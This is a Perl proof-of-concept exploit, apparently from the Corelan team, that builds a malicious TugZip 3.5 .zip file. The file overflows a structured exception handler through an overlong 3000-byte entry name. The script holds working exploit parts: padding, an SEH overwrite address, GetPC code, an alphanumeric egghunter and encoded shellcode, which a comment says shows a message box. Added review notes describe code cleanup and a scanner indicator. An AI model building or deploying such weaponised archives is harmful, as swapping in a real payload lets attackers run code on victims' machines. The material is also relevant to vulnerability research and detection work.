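#!/usr/bin/perl
# Software: TugZip 3.5 (.zip)
# Author: Lincoln
# Assisted by : corelanc0d3r
# OS: Windows
# Tested on : XP SP3 En (VirtualBox)
# Type of vuln: SEH
# Greetz to : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
#
# Code :
#
# Review notes (Perl hygiene only; the archive bytes written are unchanged):
#  - strict/warnings enabled; lexical filehandle with three-arg open and an
#    error check; binmode so a Windows text-mode handle cannot translate any
#    byte of the output.
#  - the shell-out ("del") is replaced by unlink, so no command line is built
#    from the filename.
#  - the banner line garbled by HTML rendering (<code> tags in place of
#    backticks) is restored.
# What this writes, for anyone triaging such a sample: a single-entry .zip
# whose local and central headers both carry a 0x0bb8 (3000-byte) length
# field (the author's "3k size") -- presumably the entry's filename length,
# since the 3000-byte payload ends in ".txt". An entry name this long, or one
# containing non-printable bytes, is a simple static indicator for archive
# scanners.
use strict;
use warnings;

print "|------------------------------------------------------------------|\n";
print "| __ __|\n";
print "| _________________/ /___ _____ / /________ _____ ___|\n";
print "|/ ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |\n";
print "| / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / |\n";
print "| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/|\n";
print "||\n";
print "| http://www.corelan.be:8800 |\n";
print "||\n";
print "|-------------------------------------------------[ EIP Hunters ]--|\n\n";
print "[+] Exploit for TugZip 3.5 \n";

my $filename = "tugzip.zip";

# Local file header (PK\x03\x04), as given by the author.
my $ldf_header =
    "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\xb8\x0b" .        # 3k size
    "\x00\x00\x00";

# Central directory header (PK\x01\x02), as given by the author.
my $cdf_header =
    "\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\xb8\x0b" .        # 3k size
    "\x00\x00\x00\x00\x00\x00\x01\x00" .
    "\x24\x00\x00\x00\x00\x00\x00\x00";

# End of central directory record (PK\x05\x06), as given by the author.
my $eofcdf_header =
    "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00" .
    "\xe6\x0b\x00\x00" .    # +46
    "\xe5\x0b\x00\x00" .    # +30
    "\x00\x00";

#Only about 120 bytes after p/p/r
my $getpc =
    #align regs into ebx
    "\x61\x61\x61\x61\x61\x5b" .
    #getpc: http://www.corelan.be:8800/index.php/2010/03/27/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion/
    "\x89\x05" .                #jmp short (5 bytes) to 'jmp back' at end
    "\x5e" .                    #pop esi
    "\x41" .                    #nop (inc ecx)
    "\x98\x99" .                #call esi
    "\x41" .                    #nop (inc ecx)
    "\x8a\x94\x98\x98\x98";     #jmp back to pop esi

#mov ebx into egghunter starting location, base reg esi
my $egg =
    "VYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIK9Jzs" .
    "rbrRJuRRxzmvNWLWuQJt4ZOnXPwtpTpQdLKJZLoPuzJNO3EXgkOJGA";

#msgbox: "Exploited by Corelan Security Team"
my $shellcode =
    "w00tw00t" .
    "\x89\xe3\xda\xd7\xd9\x73\xf4\x59\x49\x49\x49\x49\x49\x49" .
    "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a" .
    "\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" .
    "\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" .
    "\x75\x4a\x49\x4a\x79\x4a\x4b\x4d\x4b\x4b\x69\x51\x64\x45" .
    "\x74\x4a\x54\x45\x61\x4e\x32\x4e\x52\x42\x5a\x46\x51\x49" .
    "\x59\x42\x44\x4e\x6b\x51\x61\x44\x70\x4c\x4b\x43\x46\x44" .
    "\x4c\x4e\x6b\x42\x56\x47\x6c\x4c\x4b\x51\x56\x44\x48\x4c" .
    "\x4b\x51\x6e\x45\x70\x4e\x6b\x45\x66\x50\x38\x50\x4f\x47" .
    "\x68\x50\x75\x4c\x33\x50\x59\x45\x51\x4b\x61\x4b\x4f\x48" .
    "\x61\x51\x70\x4c\x4b\x50\x6c\x46\x44\x45\x74\x4c\x4b\x51" .
    "\x55\x47\x4c\x4c\x4b\x50\x54\x43\x35\x50\x78\x43\x31\x4b" .
    "\x5a\x4c\x4b\x42\x6a\x47\x68\x4e\x6b\x43\x6a\x47\x50\x45" .
    "\x51\x4a\x4b\x48\x63\x46\x57\x50\x49\x4e\x6b\x44\x74\x4c" .
    "\x4b\x45\x51\x4a\x4e\x44\x71\x49\x6f\x50\x31\x4b\x70\x4b" .
    "\x4c\x4e\x4c\x4f\x74\x4b\x70\x43\x44\x46\x6a\x4a\x61\x4a" .
    "\x6f\x44\x4d\x47\x71\x4b\x77\x48\x69\x4a\x51\x4b\x4f\x49" .
    "\x6f\x49\x6f\x45\x6b\x43\x4c\x45\x74\x51\x38\x51\x65\x49" .
    "\x4e\x4e\x6b\x42\x7a\x45\x74\x45\x51\x4a\x4b\x43\x56\x4e" .
    "\x6b\x46\x6c\x42\x6b\x4c\x4b\x43\x6a\x45\x4c\x43\x31\x4a" .
    "\x4b\x4e\x6b\x45\x54\x4e\x6b\x47\x71\x4d\x38\x4f\x79\x51" .
    "\x54\x46\x44\x47\x6c\x45\x31\x4a\x63\x4f\x42\x44\x48\x46" .
    "\x49\x48\x54\x4f\x79\x4b\x55\x4d\x59\x49\x52\x50\x68\x4c" .
    "\x4e\x50\x4e\x44\x4e\x48\x6c\x50\x52\x4b\x58\x4d\x4c\x4b" .
    "\x4f\x49\x6f\x4b\x4f\x4f\x79\x51\x55\x46\x64\x4d\x6b\x51" .
    "\x6e\x49\x48\x4d\x32\x51\x63\x4c\x47\x45\x4c\x44\x64\x51" .
    "\x42\x4d\x38\x4e\x6b\x49\x6f\x49\x6f\x4b\x4f\x4c\x49\x42" .
    "\x65\x47\x78\x43\x58\x42\x4c\x50\x6c\x45\x70\x4b\x4f\x51" .
    "\x78\x47\x43\x45\x62\x46\x4e\x45\x34\x45\x38\x51\x65\x51" .
    "\x63\x45\x35\x44\x32\x4d\x58\x51\x4c\x44\x64\x44\x4a\x4c" .
    "\x49\x48\x66\x43\x66\x4b\x4f\x43\x65\x46\x64\x4c\x49\x4b" .
    "\x72\x50\x50\x4d\x6b\x4e\x48\x4c\x62\x50\x4d\x4d\x6c\x4e" .
    "\x67\x47\x6c\x47\x54\x46\x32\x4b\x58\x43\x6e\x49\x6f\x49" .
    "\x6f\x49\x6f\x42\x48\x51\x74\x45\x71\x51\x48\x45\x70\x43" .
    "\x58\x44\x30\x43\x47\x42\x4e\x42\x45\x44\x71\x4b\x6b\x4b" .
    "\x38\x43\x6c\x45\x74\x46\x66\x4b\x39\x48\x63\x45\x38\x50" .
    "\x61\x42\x4d\x50\x58\x45\x70\x51\x78\x42\x59\x45\x70\x50" .
    "\x54\x51\x75\x51\x78\x44\x35\x43\x42\x50\x69\x51\x64\x43" .
    "\x58\x51\x30\x43\x63\x45\x35\x43\x53\x51\x78\x42\x45\x42" .
    "\x4c\x50\x61\x50\x6e\x42\x48\x51\x30\x51\x53\x50\x6f\x50" .
    "\x72\x45\x38\x43\x54\x51\x30\x50\x62\x43\x49\x51\x78\x42" .
    "\x4f\x43\x59\x42\x54\x50\x65\x51\x78\x42\x65\x51\x68\x42" .
    "\x50\x50\x6c\x46\x51\x48\x49\x4e\x68\x50\x4c\x46\x44\x45" .
    "\x72\x4d\x59\x49\x71\x44\x71\x4a\x72\x43\x62\x43\x63\x50" .
    "\x51\x46\x32\x4b\x4f\x48\x50\x50\x31\x4f\x30\x46\x30\x4b" .
    "\x4f\x51\x45\x44\x48\x45\x5a\x41\x41";

# --- payload ---
my $size = 2996;
my $junk = "A" x 372;
my $nseh = "\x61\x5c\x7a\x04";    #Small space, take advantage!
my $seh  = "\x7e\x30\x0c\x7e";    #ztvcabin.7E0C307E

my $payload = $junk . $nseh . $seh . $getpc . $egg . $shellcode;
# Pad to $size, then the ".txt" suffix makes the entry name 3000 bytes long,
# matching the 0x0bb8 length fields in the headers above.
my $rest = "D" x ($size - length($payload));    #more room
$payload = $payload . $rest . ".txt";

print "[+] Size : " . length($payload) . "\n";

# Best-effort removal of a previous run's output (the open below truncates
# anyway); unlink avoids building a shell command from the filename.
unlink $filename if -e $filename;

print "[+] Creating new vulnerable file: $filename\n\n";
open my $fh, '>', $filename or die "open $filename: $!";
binmode $fh;    # raw bytes: no newline translation on Windows
print {$fh} $ldf_header . $payload . $cdf_header . $payload . $eofcdf_header;
close $fh or die "close $filename: $!";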